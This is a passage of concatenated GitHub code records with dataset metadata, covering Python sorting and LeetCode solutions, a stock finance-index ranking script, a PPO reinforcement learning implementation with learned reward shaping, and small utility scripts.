final_lst:\r\n return_string += str(value) + \" \"\r\n return return_string.strip()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\ndef dups_lol(lol):\r\n duplicate_lst = []\r\n\r\n for row in lol:\r\n for value in row:\r\n if value not in duplicate_lst:\r\n duplicate_lst.append(value)\r\n else:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef dups_dict(dictionary): \r\n duplicate_lst = []\r\n\r\n for key in dictionary:\r\n duplicate_lst.append(dictionary[key])\r\n\r\n return dups_lol(duplicate_lst)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"akaif95/2D-Practice","sub_path":"2D_Practice.py","file_name":"2D_Practice.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"914762683","text":"from random import randrange\n\ndef quicksort(arr):\n size = len(arr)\n if size<=1:\n return arr\n else:\n pivot = arr.pop(randrange(size))\n lesser = quicksort([x for x in arr if x < pivot])\n greater = quicksort([x for x in arr if x >= pivot])\n return lesser + [pivot] + greater\n\nif __name__ == '__main__':\n array = []\n for i in range(10):\n array.append(randrange(100))\n\n print(\"Orignal array: \", array)\n sorted_array = quicksort(array)\n print(\"Sorted array: \", 
sorted_array)\n","repo_name":"abhishekgupta5/Algorithms","sub_path":"sorting/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}{"seq_id":"72878920488","text":"# Link : https://codeforces.com/problemset/problem/1730/C\n# author : Mohamed Ibrahim\n\n\nfor _ in range(int(input())):\n    s = input()\n    a = list(int(x) for x in s)\n    a.reverse()\n    m = 10\n    for i in range(len(s)):\n        if a[i] > m:\n            a[i] = min(a[i]+1,9)\n        m = min(a[i],m)\n    print(''.join(str(x) for x in sorted(a)))\n\n\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"Data Structure Problems/C. Minimum Notation.py","file_name":"C. Minimum Notation.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}{"seq_id":"7023548282","text":"# coding: utf8\n'''\nCreated on 2018年9月17日\n\n@author: ll\n'''\nimport finance_factor_calc as fic\nfrom finance_factor_calc import finance_index_dic as FID\nimport stock_data_download\nimport pandas as pd\nimport os\n\nclass finance_index_rank:\n    def __init__(self,path = '../../../data/finance_processed',path_score = '../../../data/score', stocks = '000001', dates=['2018-06-30']):\n        self.stock_codes = []\n        self.path = path\n        self.path_score = path_score\n        if not os.path.exists(path_score):\n            os.makedirs(path_score)\n        self.path_overview_scores = os.path.join(path_score,'overview_scores_{}.csv'.format(dates[-1]))\n        self.path_index = os.path.join(path_score,'index_{}.csv'.format(dates[-1]))\n        self.path_index_score = os.path.join(path_score,'index_score_{}.csv'.format(dates[-1]))\n        self.finance_index_data = self.load_all_finance_index(dates,stocks)\n    \n    def load_all_finance_index(self,dates,stocks):\n        # stock_codes = ['000719']\n        data_dict = {}\n        for stock_code in stocks:\n            print(\"stock:\",stock_code)\n            data_finance = fic.load_process_financical_data(self.path, stock_code)\n            if data_finance.empty:\n                print('skip this stock', stock_code)\n                continue\n            if sum(data_finance.index.isin(dates))!=len(dates):\n                print('skip this stock', stock_code)\n                continue\n            self.stock_codes.append(stock_code)\n            data_dict[stock_code] = data_finance\n        return data_dict\n    \n    def assess_one_finance_index(self, index, dates):\n        index_series = pd.Series(dtype=float)\n        score_series = pd.Series(dtype=float)\n        len_dates = len(dates)\n        for stock_code in self.stock_codes:\n            index_series[stock_code] = 0.0\n            for date in dates:\n                print('date',date,'stock_code',stock_code)\n                index_series[stock_code] = index_series[stock_code] + self.finance_index_data[stock_code].loc[date,index]\n            index_series[stock_code] = index_series[stock_code] / float(len_dates);\n        index_series_sorted = index_series.sort_values(axis=0,ascending=False) #sorted(index_series.items(), key = lambda d:d[1],reverse = True)\n        stock_len = len(index_series_sorted)\n        rank_index=0\n        for stock in index_series_sorted.index:\n            score_series[stock] = float(stock_len-rank_index)/float(stock_len) * 100.0\n            rank_index = rank_index + 1\n        score_series = score_series.sort_index(axis=0,ascending=True)#sorted(score_series.items(), key = lambda d:d[0],reverse = True)\n        return [pd.DataFrame({index:index_series}), pd.DataFrame({index:score_series})]\n    \n    def fetch_selected_finance_indexs(self, indexs, dates,path_kmean):\n        fecth_indexs = pd.Series(dtype=float)\n        for date in dates:\n            pd_indexs_path = 
os.path.join(path_kmean,'fecthing_finance_index_{}.csv'.format(date))\n if not os.path.exists(pd_indexs_path):\n pd_indexs = pd.DataFrame(dtype=float)\n print('fecthing date', date)\n for index in indexs:\n print('processing index is', index)\n [pd_index, pd_score] = self.assess_one_finance_index(index, [date])\n pd_indexs = pd.concat([pd_indexs, pd_index], axis=1)\n pd_indexs.to_csv(pd_indexs_path, encoding='gbk')\n else:\n pd_indexs = pd.read_csv(pd_indexs_path,index_col=0)\n fecth_indexs[date] = pd_indexs\n return fecth_indexs\n \n def assess_selected_finance_index(self,indexs,dates):\n pd_indexs = pd.DataFrame()\n pd_scores = pd.DataFrame()\n for index in indexs:\n print('processing index is', index)\n [pd_index, pd_score] = self.assess_one_finance_index(index, dates)\n pd_indexs = pd.concat([pd_indexs, pd_index], axis=1)\n pd_scores = pd.concat([pd_scores, pd_score], axis=1)\n \n pd_mean_scores = pd_scores.mean(axis=1)\n pd_mean_scores = pd_mean_scores.sort_values(axis=0,ascending=False)\n pd_mean_scores.to_csv(self.path_overview_scores, encoding='gbk')\n pd_scores.to_csv(self.path_index_score, encoding='gbk')\n pd_indexs.to_csv(self.path_index, encoding='gbk')\n \n \n \nif __name__ == '__main__':\n path = '../../../data/finance_processed'\n path_score = '../../../data/score'\n print(fic.finance_index_dic['roe'])\n stocks = stock_data_download.ts_stock_codes()\n #stocks = ['000001','000002','000004','000005','000006']\n dates = ['2018-06-30']#,'2017-12-31'\n fir = finance_index_rank(path=path, path_score=path_score, stocks = stocks, dates = dates)\n indexs = [\n #earning capacity\n FID['roe'],\\\n FID['roa'],\\\n FID['profit_revenue'],\\\n FID['profit_cost'],\\\n FID['equlity_incr_rate'],\\\n ###grow capacity\n FID['revenue_incr_rate'],\\\n FID['profit_incr_rate'],\\\n FID['cash_incr_rate'],\\\n FID['asset_incr_rate'],\\\n ]\n \"\"\" \n FID['debt_incr_rate'],\\\n ###asset struct\n FID['debt_asset_ratio'],\\\n FID['debt_equality_ratio'],\\\n FID['debt_net_asset_ratio'],\\\n FID['revenue_asset_ratio'],\\\n FID['goodwell_equality_ratio'],\\\n FID['dev_rev_ratio']\\\n \"\"\"\n \n \n \n fir.assess_selected_finance_index(indexs, dates)\n print('rank all the stock successfully');\n #data_dict = load_all_finance_processed_data(path)\n\n pass","repo_name":"luozero/finance_quant","sub_path":"bak/finance_index_rank.py","file_name":"finance_index_rank.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"6812603819","text":"import torch\nimport torch.nn as nn\nfrom torch.distributions import MultivariateNormal\nfrom torch.distributions import Categorical\nimport numpy as np\n\n################################## set device ##################################\nprint(\"============================================================================================\")\ndevice = torch.device('cpu')\n\nprint(\"Device set to : cpu\")\nprint(\"============================================================================================\")\ntorch.autograd.set_detect_anomaly(True)\n\n################################## PPO Policy ##################################\nclass RolloutBuffer:\n def __init__(self):\n self.actions = []\n self.states = []\n self.logprobs = []\n self.is_terminals = []\n self.rewards = []\n\n self.v_pred_true = []\n self.v_pred = []\n self.f_phi_s = []\n self.function = []\n \n def clear(self):\n del self.actions[:]\n del self.states[:]\n del self.logprobs[:]\n del self.is_terminals[:]\n 
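# NOTE: the remaining per-rollout traces are dropped below as well (rewards plus the reward-shaping caches), so every update starts from an empty buffer\n        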
del self.rewards[:]\n\n\n del self.v_pred_true[:]\n del self.v_pred[:]\n del self.f_phi_s[:]\n del self.function[:]\n\n\nclass Dataset(object):\n def __init__(self, data_map, deterministic=False, shuffle=True):\n self.data_map = data_map\n self.deterministic = deterministic\n self.enable_shuffle = shuffle\n self.n = next(iter(data_map.values())).shape[0]\n self._next_id = 0\n self.shuffle()\n\n def shuffle(self):\n if self.deterministic:\n return\n perm = np.arange(self.n)\n np.random.shuffle(perm)\n\n for key in self.data_map:\n self.data_map[key] = self.data_map[key][perm]\n\n self._next_id = 0\n\n def next_batch(self, batch_size):\n if self._next_id >= self.n and self.enable_shuffle:\n self.shuffle()\n\n cur_id = self._next_id\n cur_batch_size = min(batch_size, self.n - self._next_id)\n self._next_id = cur_id + cur_batch_size\n\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][cur_id:cur_id+cur_batch_size]\n return data_map\n\n def iterate_once(self, batch_size):\n if self.enable_shuffle: self.shuffle()\n\n while self._next_id <= self.n - batch_size:\n yield self.next_batch(batch_size)\n self._next_id = 0\n\n def subset(self, num_elements, deterministic=True):\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][:num_elements]\n return Dataset(data_map, deterministic)\n\nclass ActorCritic(nn.Module):\n def __init__(self, state_dim, action_dim, last_dim, has_continuous_action_space, action_std_init):\n super(ActorCritic, self).__init__()\n\n self.has_continuous_action_space = has_continuous_action_space\n self.first_optim = True\n if has_continuous_action_space:\n self.action_dim = action_dim\n self.action_var = torch.full((action_dim,), action_std_init * action_std_init).to(device)\n # actor\n \n if has_continuous_action_space :\n self.pol = nn.Sequential(\n nn.Linear(state_dim + last_dim, 8),\n nn.Tanh(),\n nn.Linear(8, 8),\n nn.Tanh(),\n nn.Linear(8, action_dim),\n nn.Tanh()\n )\n else:\n self.pol = nn.Sequential(\n nn.Linear(state_dim + last_dim, 8),\n nn.Tanh(),\n nn.Linear(8, 8),\n nn.Tanh(),\n nn.Linear(8, action_dim),\n nn.Softmax(dim=-1)\n )\n self.vf_true = nn.Sequential(\n nn.Linear(state_dim, 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1)\n )\n \n self.vf_shaped = nn.Sequential(\n nn.Linear(state_dim+ last_dim, 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1)\n )\n\n \n self.f_phi = nn.Sequential(\n nn.Linear(state_dim, 16),\n nn.Tanh(),\n nn.Linear(16,8),\n nn.Tanh(),\n nn.Linear(8, last_dim),\n nn.Tanh()\n ) \n \n def set_action_std(self, new_action_std):\n if self.has_continuous_action_space:\n self.action_var = torch.full((self.action_dim,), new_action_std * new_action_std).to(device)\n else:\n print(\"--------------------------------------------------------------------------------------------\")\n print(\"WARNING : Calling ActorCritic::set_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def forward(self):\n raise NotImplementedError\n \n def act(self, state):\n\n vpred_true = self.vf_true(state)\n f_phi_s = self.f_phi(state)\n last_out = torch.concat([state, f_phi_s], axis=0)\n\n if self.has_continuous_action_space:\n action_mean = self.pol(last_out)\n cov_mat = torch.diag(self.action_var).unsqueeze(dim=0)\n dist = MultivariateNormal(action_mean, cov_mat)\n else:\n action_probs = self.pol(last_out)\n dist = Categorical(action_probs)\n\n action = 
dist.sample()\n action_logprob = dist.log_prob(action)\n vpred = self.vf_shaped(last_out)\n\n return action.detach(), action_logprob.detach(), vpred.detach(), vpred_true.detach(), f_phi_s.detach()\n \n def evaluate(self, state, action):\n\n vpred_true = self.vf_true(state)\n f_phi_s = self.f_phi(state)\n last_out = torch.concat([state, f_phi_s], axis=1)\n \n if self.has_continuous_action_space:\n action_mean = self.pol(last_out)\n \n action_var = self.action_var.expand_as(action_mean)\n cov_mat = torch.diag_embed(action_var).to(device)\n dist = MultivariateNormal(action_mean, cov_mat)\n \n # For Single Action Environments.\n if self.action_dim == 1:\n action = action.reshape(-1, self.action_dim)\n else:\n action_probs = self.pol(last_out)\n dist = Categorical(action_probs)\n action_logprobs = dist.log_prob(action)\n\n dist_entropy = dist.entropy()\n\n vpred = self.vf_shaped(last_out) \n\n return action_logprobs.cpu().flatten(), dist_entropy.cpu().flatten(), vpred.cpu().flatten(), vpred_true.cpu().flatten(), f_phi_s.cpu().flatten()\n\n\nclass PPO:\n def __init__(self, state_dim, action_dim,last_dim, lr_actor, lr_critic, lr_f, gamma, lam, K_epochs, batch_size, eps_clip, entropy_coeff, has_continuous_action_space, action_std_init=0.6):\n\n self.has_continuous_action_space = has_continuous_action_space\n self.optimize_policy = True\n\n if has_continuous_action_space:\n self.action_std = action_std_init\n\n self.entropy_coeff = entropy_coeff\n self.gamma = gamma\n self.lam = lam\n self.eps_clip = eps_clip\n self.K_epochs = K_epochs\n self.first_optim = True\n self.optim_batch_size = batch_size\n self.buffer = RolloutBuffer()\n\n self.pi = ActorCritic(state_dim, action_dim, last_dim, has_continuous_action_space, action_std_init).to(device)\n \n self.policy_opt = torch.optim.Adam([\n {'params': self.pi.pol.parameters(), 'lr': lr_actor,\"eps\":1e-5 },\n ])\n self.critic_opt = torch.optim.Adam([\n {'params': self.pi.vf_shaped.parameters(), 'lr': lr_critic, \"eps\":1e-5},\n ])\n\n self.true_critic_opt = torch.optim.Adam([\n {'params': self.pi.vf_true.parameters(), 'lr': lr_critic, \"eps\":1e-5},\n ])\n\n self.f_opt = torch.optim.Adam([\n {'params': self.pi.f_phi.parameters(), 'lr': lr_f, \"eps\":1e-5},\n ])\n self.pi_old = ActorCritic(state_dim, action_dim,last_dim, has_continuous_action_space, action_std_init).to(device)\n self.pi_old.load_state_dict(self.pi.state_dict())\n self.MseLoss = nn.MSELoss()\n\n def set_action_std(self, new_action_std):\n if self.has_continuous_action_space:\n self.action_std = new_action_std\n self.pi.set_action_std(new_action_std)\n self.pi_old.set_action_std(new_action_std)\n else:\n print(\"--------------------------------------------------------------------------------------------\")\n print(\"WARNING : Calling PPO::set_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def decay_action_std(self, action_std_decay_rate, min_action_std):\n print(\"--------------------------------------------------------------------------------------------\")\n if self.has_continuous_action_space:\n self.action_std = self.action_std - action_std_decay_rate\n self.action_std = round(self.action_std, 4)\n if (self.action_std <= min_action_std):\n self.action_std = min_action_std\n print(\"setting actor output action_std to min_action_std : \", self.action_std)\n else:\n print(\"setting actor output action_std to : \", self.action_std)\n self.set_action_std(self.action_std)\n\n 
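# a discrete policy samples from a categorical distribution, so there is no action-noise scale to decay\n        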
else:\n print(\"WARNING : Calling PPO::decay_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def choose_action(self, state):\n\n if self.has_continuous_action_space:\n with torch.no_grad():\n state = torch.FloatTensor(state).to(device)\n action, action_logprob, vpred ,vpred_true , f_phi_s = self.pi_old.act(state)\n self.buffer.states.append(state)\n self.buffer.actions.append(action)\n self.buffer.logprobs.append(action_logprob)\n self.buffer.v_pred.append(vpred)\n self.buffer.v_pred_true.append(vpred_true)\n self.buffer.f_phi_s.append(f_phi_s)\n\n return action.detach().cpu().numpy().flatten(), vpred.detach().cpu().numpy().flatten(), vpred_true.detach().cpu().numpy().flatten() , f_phi_s.detach().cpu().numpy().flatten() \n else:\n with torch.no_grad():\n state = torch.FloatTensor(state).to(device)\n action, action_logprob, vpred ,vpred_true ,f_phi_s = self.pi_old.act(state)\n self.buffer.states.append(state)\n self.buffer.actions.append(action)\n self.buffer.logprobs.append(action_logprob)\n self.buffer.v_pred.append(vpred)\n self.buffer.v_pred_true.append(vpred_true)\n self.buffer.f_phi_s.append(f_phi_s)\n\n return action.cpu().numpy().flatten(), vpred.cpu().numpy().flatten(), vpred_true.cpu().numpy().flatten(), f_phi_s.detach().cpu().numpy().flatten() \n\n def ppo_update(self, **kwargs):\n self.ppo_update_policy( **kwargs)\n self.ppo_update_shaping_weight_func( **kwargs)\n\n def ppo_update_policy(self, **kwargs):\n truncation_size = len(self.buffer.states)-1\n\n seg = {\"ob\": torch.tensor([self.buffer.states[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"ac\": torch.tensor([self.buffer.actions[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"old_logprobs\": torch.tensor([self.buffer.logprobs[0].cpu().clone() for _ in range(truncation_size)]),\n \"rew\": torch.zeros(truncation_size, dtype=float),\n \"v_pred\": torch.zeros(truncation_size, dtype=float),\n \"done\": torch.zeros(truncation_size, dtype=int),\n \"F\": torch.zeros(truncation_size, dtype=float),\n \"f_phi_s\": torch.zeros(truncation_size, dtype=float)\n }\n \n for t in range(truncation_size):\n seg[\"ob\"][t] = self.buffer.states[t].cpu().clone()\n seg[\"ac\"][t] = self.buffer.actions[t].cpu().clone()\n seg[\"old_logprobs\"][t] = self.buffer.logprobs[t].cpu().clone()\n seg[\"rew\"][t] = self.buffer.rewards[t]\n seg[\"done\"][t] = self.buffer.is_terminals[t]\n seg[\"v_pred\"][t] = self.buffer.v_pred[t]\n seg[\"f_phi_s\"][t] = self.buffer.f_phi_s[t].cpu().clone()\n seg[\"F\"][t] = self.buffer.function[t]\n \n vpred = torch.tensor(np.append(seg[\"v_pred\"], kwargs.get(\"next_v_pred\")))\n seg_done = seg[\"done\"]\n seg_rewards = seg[\"rew\"]\n seg_F = seg[\"F\"]\n seg_f = seg[\"f_phi_s\"]\n\n gae_lam = torch.empty(truncation_size, dtype = float)\n last_gae_lam = 0\n for t in reversed(range(truncation_size)):\n non_terminal = 1 - seg_done[t]\n delta = seg_rewards[t] + seg_f[t] * seg_F[t] + self.gamma * vpred[t + 1] * non_terminal - vpred[t]\n gae_lam[t] = delta + self.gamma * self.lam * non_terminal * last_gae_lam\n last_gae_lam = gae_lam[t]\n \n seg[\"adv\"] = gae_lam\n seg[\"td_lam_ret\"] = seg[\"adv\"] + seg[\"v_pred\"]\n self.learn(ob=seg[\"ob\"], ac=seg[\"ac\"], adv=seg[\"adv\"],\n td_lam_ret=seg[\"td_lam_ret\"],\n f_phi_s=seg[\"f_phi_s\"], old_logprobs= seg[\"old_logprobs\"])\n self.switch_optimization()\n\n def ppo_update_shaping_weight_func(self, **kwargs):\n\n truncation_size = 
len(self.buffer.states)-1\n\n seg = {\"ob\": torch.tensor([self.buffer.states[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"ac\": torch.tensor([self.buffer.actions[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"old_logprobs\": torch.tensor([self.buffer.logprobs[0].cpu().clone() for _ in range(truncation_size)]),\n \"rew\": torch.zeros(truncation_size, dtype=float),\n \"v_pred_true\": torch.zeros(truncation_size, dtype=float),\n \"done\": torch.zeros(truncation_size, dtype=int),\n \"F\": torch.zeros(truncation_size, dtype=float),\n \"f_phi_s\": torch.zeros(truncation_size, dtype=float)\n }\n\n for t in range(truncation_size):\n seg[\"ob\"][t] = self.buffer.states[t].cpu().clone()\n seg[\"ac\"][t] = self.buffer.actions[t].cpu().clone() \n seg[\"old_logprobs\"][t] = self.buffer.logprobs[t].cpu().clone()\n seg[\"rew\"][t] = self.buffer.rewards[t] \n seg[\"done\"][t] = self.buffer.is_terminals[t]\n seg[\"v_pred_true\"][t] = self.buffer.v_pred_true[t].cpu().clone()\n seg[\"f_phi_s\"][t] = self.buffer.f_phi_s[t].cpu().clone()\n\n seg_done = seg[\"done\"]\n seg_v_pred_true = torch.tensor(np.append(seg[\"v_pred_true\"], kwargs.get(\"next_v_pred_true\")))\n\n gae_lam = torch.empty(truncation_size, dtype = float)\n seg_rewards = seg[\"rew\"]\n last_gae_lam = 0\n\n for t in reversed(range(truncation_size)):\n non_terminal = 1 - seg_done[t] \n delta = seg_rewards[t] + self.gamma * seg_v_pred_true[t + 1] * non_terminal - seg_v_pred_true[t]\n gae_lam[t] = delta + self.gamma * self.lam * non_terminal * last_gae_lam\n last_gae_lam = gae_lam[t]\n\n seg[\"adv_true\"] = gae_lam\n seg[\"ret_true\"] = seg[\"adv_true\"] + seg[\"v_pred_true\"]\n\n self.learn(ob=seg[\"ob\"], ac=seg[\"ac\"], adv_true=seg[\"adv_true\"],\n ret_true=seg[\"ret_true\"],\n f_phi_s=seg[\"f_phi_s\"], old_logprobs= seg[\"old_logprobs\"])\n \n self.switch_optimization()\n \n \n def learn(self, **kwargs):\n if self.optimize_policy:\n self.update_policy(**kwargs)\n\n else:\n self.update_shaping_weight_func(**kwargs)\n \n def update_policy(self, **kwargs):\n bs = kwargs.get(\"ob\")\n ba = kwargs.get(\"ac\")\n batch_adv = kwargs.get(\"adv\")\n batch_td_lam_ret = kwargs.get(\"td_lam_ret\")\n batch_f_phi_s = kwargs.get(\"f_phi_s\")\n batch_adv = (batch_adv - batch_adv.mean()) / batch_adv.std()\n\n old_logprobs = kwargs.get(\"old_logprobs\")\n\n d = Dataset(dict(bs=bs, \n ba=ba, \n badv=batch_adv,\n bret=batch_td_lam_ret,\n bf=batch_f_phi_s, \n old_logprobs = old_logprobs),\n\n deterministic=False)\n self.pi_old.load_state_dict(self.pi.state_dict())\n \n batch_size = self.optim_batch_size or bs.shape[0]\n for _ in range(self.K_epochs):\n for batch in d.iterate_once(batch_size):\n atarg = batch[\"badv\"]\n action_logprobs, dist_entropy, vpred, _, _ = self.pi.evaluate(batch[\"bs\"], batch[\"ba\"])\n mean_ent = torch.mean(dist_entropy)\n\n ratio = torch.exp(action_logprobs - batch[\"old_logprobs\"])\n # Finding Surrogate Loss \n surr1 = torch.where(\n torch.logical_or(torch.isinf(ratio * atarg ), torch.isnan(ratio * atarg)),\n torch.zeros_like(ratio),\n ratio * atarg\n )\n \n surr2 = torch.clamp(ratio, 1-self.eps_clip, 1+self.eps_clip) * atarg\n # final loss of clipped objective PPO\n vf_loss = torch.mean(torch.square(vpred - batch[\"bret\"])) \n pol_surr = torch.mean(torch.minimum(surr1, surr2))\n pol_ent_pen = -1 * self.entropy_coeff * mean_ent\n total_loss = pol_surr + pol_ent_pen + vf_loss\n\n # take gradient step\n self.critic_opt.zero_grad()\n self.policy_opt.zero_grad()\n\n 
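# vf_loss is also a term inside total_loss, so this pair of backward calls accumulates the critic gradient twice; retain_graph=True keeps the shared graph alive for the second pass\n                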
vf_loss.backward(retain_graph=True)\n                total_loss.backward()\n\n                # vf_loss.backward()\n                # torch.nn.utils.clip_grad_norm_(self.pi.vf_shaped.parameters(), 1.0)\n                # torch.nn.utils.clip_grad_norm_(self.pi.pol.parameters(), 1.0)\n\n                self.critic_opt.step()\n                self.policy_opt.step()\n            \n\n    def update_shaping_weight_func(self, **kwargs):\n\n        bs = kwargs.get(\"ob\")\n        ba = kwargs.get(\"ac\")\n        batch_adv = kwargs.get(\"adv_true\")\n        batch_ret = kwargs.get(\"ret_true\")\n        batch_f_phi_s = kwargs.get(\"f_phi_s\")\n        batch_adv = (batch_adv - batch_adv.mean()) / batch_adv.std()\n        old_logprobs = kwargs.get(\"old_logprobs\")\n\n        d = Dataset(dict(bs=bs,\n                         ba=ba, \n                         badv=batch_adv, \n                         bret=batch_ret,\n                         bf=batch_f_phi_s,\n                         old_logprobs = old_logprobs),\n                    deterministic=False)\n        \n        batch_size = self.optim_batch_size or bs.shape[0]\n        self.pi_old.load_state_dict(self.pi.state_dict())\n\n        for _ in range(self.K_epochs):\n            for batch in d.iterate_once(batch_size):\n                action_logprobs, _, _, vpred_true, _ = self.pi.evaluate(batch[\"bs\"], batch[\"ba\"])\n\n                atarg_true = batch[\"badv\"]\n                ratio_clip_param_f = 0.2\n                ratio = torch.exp(action_logprobs - batch[\"old_logprobs\"])\n\n                vf_true_loss = torch.mean(torch.square(vpred_true - batch[\"bret\"])) \n                surr1_f = torch.where(torch.logical_or(\n                    torch.isinf(ratio * atarg_true),\n                    torch.isnan(ratio * atarg_true)),\n                    torch.zeros_like(ratio),\n                    ratio * atarg_true)\n                surr2_f = torch.clamp(ratio, 1-ratio_clip_param_f, 1+ratio_clip_param_f) * atarg_true\n                f_loss = - torch.mean(torch.minimum(surr1_f, surr2_f))\n\n                self.true_critic_opt.zero_grad()\n                self.f_opt.zero_grad()\n\n                vf_true_loss.backward()\n                f_loss.backward()\n\n                # torch.nn.utils.clip_grad_norm_(self.pi.vf_true.parameters(), 1.0)\n                # torch.nn.utils.clip_grad_norm_(self.pi.f_phi.parameters(), 10.0)\n\n                self.true_critic_opt.step()\n                self.f_opt.step()\n\n        self.buffer.clear()\n        \n\n    def switch_optimization(self):\n        self.optimize_policy = not self.optimize_policy\n\n    def save(self, checkpoint_path):\n        torch.save(self.pi_old.state_dict(), checkpoint_path)\n    \n    def load(self, checkpoint_path):\n        self.pi_old.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))\n        self.pi.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))\n    \n    \n    \n\n\n","repo_name":"CAI23sbP/bi-level-optimization-of-parameterized-reward-shaping","sub_path":"PPO.py","file_name":"PPO.py","file_ext":"py","file_size_in_byte":21424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"17805606345","text":"import sys \nfrom pathlib import Path\nimport os \nimport re\n\ndossier_racine = Path(sys.argv[1])\n\nimport os\n\n\nimport os\n\n# Path of the root folder to explore\n\n# List for recording the file links\nliens_fichiers = []\n\n# Walk the folder tree recursively\nfor dossier, sous_dossiers, fichiers in os.walk(dossier_racine):\n    for fichier in fichiers:\n        # Build the absolute path to the file\n        chemin_fichier = os.path.join(dossier, fichier)\n        # Add the file path to the list\n        liens_fichiers.append(chemin_fichier)\n\n# regular expression to collect every annotation-instruction page from the general part of the guide!\nlinks_re = re.compile(r\".*/content/(docs/general_guideline/.*)\")\ntag = re.compile(r\".*/content/docs/general_guideline/(.*/)+(\\w+).md\")\n\ndict_link = {}\n# # Display the file links recorded in the list\nfor element in liens_fichiers:\n\t\t# 
match the directory regular expression against the collected file paths\n\t\tm = re.match(links_re,element)\n\t\tif m:\n\t\t\t# if we are inside a matching folder, match the (.md) pattern to recover the tag associated with the right path\n\t\t\tn = re.match(tag,element)\n\t\t\tif n:\n\t\t\t\t# add the information to the dictionary: dict_link[relative path]=tag\n\t\t\t\tdict_link[m.group(1)]=n.group(2)\n\n\n#print(dict_link)\n\n# write the results to a .csv file\nwith open(\"links.csv\",\"w\",encoding=\"utf-8\") as output:\n\toutput.write(\"tag;link\")\n\tfor key,value in dict_link.items():\n\t\toutput.write(f\"{str(value)};{str(key)}\\n\") \n","repo_name":"Julie921/guideline_prototype_hugo","sub_path":"tools/create_links/get_link.py","file_name":"get_link.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}{"seq_id":"3891686259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# k67.py\nfrom chap7.utils import mongo_connect\n\nif __name__ == '__main__':\n    collection = mongo_connect()\n\n    oasis = list(collection.find({'aliases.name': 'オアシス'}))\n    for data in oasis:\n        print(data)\n","repo_name":"Cain96/nlp100","sub_path":"chap7/k67.py","file_name":"k67.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"20522802182","text":"#!/usr/bin/env ipython\n\nfrom typing import Tuple, Union, Optional, Dict, Any\n\n\nKINDLE_SEPARATOR: str = \"==========\"\nEMACS_TIME = \"[%Y-%m-%d %a %H:%M]\"\nEMACS_DATE = \"<%Y-%m-%d %a>\"\nKINDLE_TIME = \"Added on %A, %B %d, %Y %I:%M:%S %p\"\n\n\n# Type definitions\nPageRange = Tuple[Union[str, int], Optional[Union[str, int]]]\nLocationRange = Tuple[int, Optional[int]]\nHash = int\nHeading = str\nBookTitle = str\nAuthorName = str\nSeries = str\nIsNoteCollated = bool\nProperties = Dict[str, Any]\n","repo_name":"lyterk/KindleToOrg","sub_path":"static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}{"seq_id":"35452334415","text":"\n# https://leetcode-cn.com/problems/daily-temperatures/\nfrom typing import List\n\nclass Solution:\n    # times out (TLE)\n    def dailyTemperaturesI(self, T: List[int]) -> List[int]:\n        copyT = T\n\n        arr = []\n        for j in range(0, len(T)):\n            tmp = []\n            for i in range(j+1, len(copyT)):\n                tmp.append(T[i] - T[j])\n                if(T[i] - T[j])>0:\n                    break\n            arr.append(tmp)\n\n        ans = []\n\n        for elem in arr:\n            ans.append(0)\n            for j in range(0, len(elem)):\n                if elem[j] > 0:\n                    ans.pop()\n                    ans.append(j+1)\n                    break\n\n\n        return ans\n\n    def dailyTemperaturesII(self, T: List[int]) -> List[int]:\n        n = len(T)\n\n        ans, nxt, big = [0] * n, dict(), 10 ** 9\n\n        for i in range(n - 1, -1, -1):\n            warmer_index = min(nxt.get(t, big) for t in range(T[i] + 1, 102))\n            if warmer_index != big:\n                ans[i] = warmer_index - i\n            nxt[T[i]] = i\n\n        return ans\n\n    def dailyTemperaturesIII(self, T: List[int]) -> List[int]:\n        length = len(T)\n        ans = [0] * length\n        stack = []\n        for i in range(length):\n            temperature = T[i]\n            while stack and temperature > T[stack[-1]]:\n                prev_index = stack.pop()\n                ans[prev_index] = i - prev_index\n            stack.append(i)\n        return ans\n\n\n\n\n\n\ns = Solution()\ns.dailyTemperaturesIII([73, 74, 75, 71, 69, 72, 76, 
